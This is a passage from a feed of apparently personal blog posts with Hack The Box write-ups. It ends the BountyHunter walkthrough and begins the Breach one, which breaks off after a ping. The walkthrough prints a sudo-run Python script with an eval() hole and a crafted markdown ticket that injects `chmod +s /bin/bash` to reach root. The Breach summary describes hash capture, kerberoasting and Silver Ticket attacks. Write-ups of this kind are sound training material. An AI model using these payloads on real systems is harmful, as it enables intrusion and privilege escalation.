stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But I think the most accurate would be the sudo misconfig</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AWlh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AWlh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!AWlh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!AWlh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!AWlh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AWlh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:339343,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!AWlh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!AWlh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!AWlh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!AWlh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6598a2c-8a81-462f-990b-40e850a4e94c_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>It&#8217;s a custom script:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kKeg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kKeg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!kKeg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!kKeg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!kKeg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kKeg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:345260,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9749225d-41b1-441f-b1ab-e16f0281d193_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kKeg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!kKeg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!kKeg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!kKeg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24b6dfce-09db-4107-b74f-164f9d8caddd_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let&#8217;s see if it&#8217;s abuse-able and can lead to escalation.</p><ol start="6"><li><p><em>Abusing eval() on user-controlled for PrivEsc</em></p></li></ol><p>Let&#8217;s logon first!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ssh 10.129.95.166 -u development -p m19RoAU0hP41A1sTsq6K
SSH         10.129.95.166   22     10.129.95.166    [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
SSH         10.129.95.166   22     10.129.95.166    [+] development:m19RoAU0hP41A1sTsq6K (Pwn3d!) Linux - Shell access!</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo ssh development@10.129.95.166
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
development@10.129.95.166's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 02 Apr 2026 07:20:25 AM UTC

  System load:           0.06
  Usage of /:            23.7% of 6.83GB
  Memory usage:          23%
  Swap usage:            0%
  Processes:             215
  Users logged in:       0
  IPv4 address for eth0: 10.129.95.166
  IPv6 address for eth0: dead:beef::250:56ff:feb0:3ad4


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Apr  2 07:20:18 2026 from 10.10.15.169
development@bountyhunter:~$ id
uid=1000(development) gid=1000(development) groups=1000(development)</code></pre></div><p>This is about the script:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">development@bountyhunter:~$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
/root
Wrong file type.
development@bountyhunter:~$ cat /opt/skytrain_inc/ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber &gt; 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()
development@bountyhunter:~$</code></pre></div><p>So based on here, it&#8217;s clear that eval() on user-controlled input. The way i will abuses it is to create this MD file on /tmp:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">development@bountyhunter:~$ vi /tmp/evil.md
development@bountyhunter:~$ cat /tmp/evil.md 
# Skytrain Inc
## Ticket to pwn
__Ticket Code:__
**11+__import__('os').system('chmod +s /bin/bash')**
development@bountyhunter:~$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
/tmp/evil.md
Destination: pwn
Invalid ticket.
development@bountyhunter:~$</code></pre></div><p>That&#8217;s it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">development@bountyhunter:~$ bash -p
bash-5.0#</code></pre></div><p>Then just run bash!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Q-GR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Q-GR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png 424w, https://substackcdn.com/image/fetch/$s_!Q-GR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png 848w, https://substackcdn.com/image/fetch/$s_!Q-GR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png 1272w, https://substackcdn.com/image/fetch/$s_!Q-GR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Q-GR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png" width="880" height="465" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:465,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:197540,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Q-GR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png 424w, https://substackcdn.com/image/fetch/$s_!Q-GR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png 848w, https://substackcdn.com/image/fetch/$s_!Q-GR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png 1272w, https://substackcdn.com/image/fetch/$s_!Q-GR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a632374-6b6a-46d3-bd75-e5fd5876a2af_880x465.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/machine/2489228/359">labs.hackthebox.com/achievement/machine/2489228/359</a></p></li></ul><p>Until next time and Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Breach - Windows (Medium)]]></title><description><![CDATA[Abusing guest account leading to fetch NetNTLMv2 hash from SMB share attack and gain local user access, perform Kerberos attack to gain SVC that have ST attack and gain dangerous PrivEsc to Admin.]]></description><link>https://byt3n33dl3.substack.com/p/htb-breach-windows-medium</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-breach-windows-medium</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Wed, 01 Apr 2026 15:28:15 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!e8vp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!e8vp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!e8vp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png 424w, https://substackcdn.com/image/fetch/$s_!e8vp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png 848w, https://substackcdn.com/image/fetch/$s_!e8vp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png 1272w, https://substackcdn.com/image/fetch/$s_!e8vp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!e8vp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png" width="813" height="530" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:530,&quot;width&quot;:813,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:218502,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!e8vp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png 424w, https://substackcdn.com/image/fetch/$s_!e8vp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png 848w, https://substackcdn.com/image/fetch/$s_!e8vp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png 1272w, https://substackcdn.com/image/fetch/$s_!e8vp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c166fc2-1e33-4a9c-a3ce-f59a94ce41b6_813x530.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>HTB Breach</h2><p><em>From HTB:</em></p><p>Breach is a medium difficulty Windows machine, where guest access to an SMB share is available. By leveraging write permissions on that SMB share, NTLMv2 hashes of a domain user are captured to obtain valid credentials. </p><p>With access as a low-privileged domain user, a kerberoastable service account (svc_mssql) is revealed. After getting access to the service account, a Silver Ticket attack is performed to impersonate the Administrator user and gain access to Microsoft SQL Server. </p><p>Through the xp_cmdshell feature, remote code execution is achieved as the svc_mssql service account. Finally, privilege escalation is performed by abusing the SeImpersonatePrivilege privilege.</p><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;24ca52a7-86b4-4efb-bb1c-1b406e64e944&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 10.129.11.224   
PING 10.129.11.224 (10.129.11.224) 56(84) bytes of data.
64 bytes from 10.129.11.224: icmp_seq=1 ttl=127 time=250 ms
64 bytes from 10.129.11.224: icmp_seq=2 ttl=127 time=261 ms

--- 10.129.11.224 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
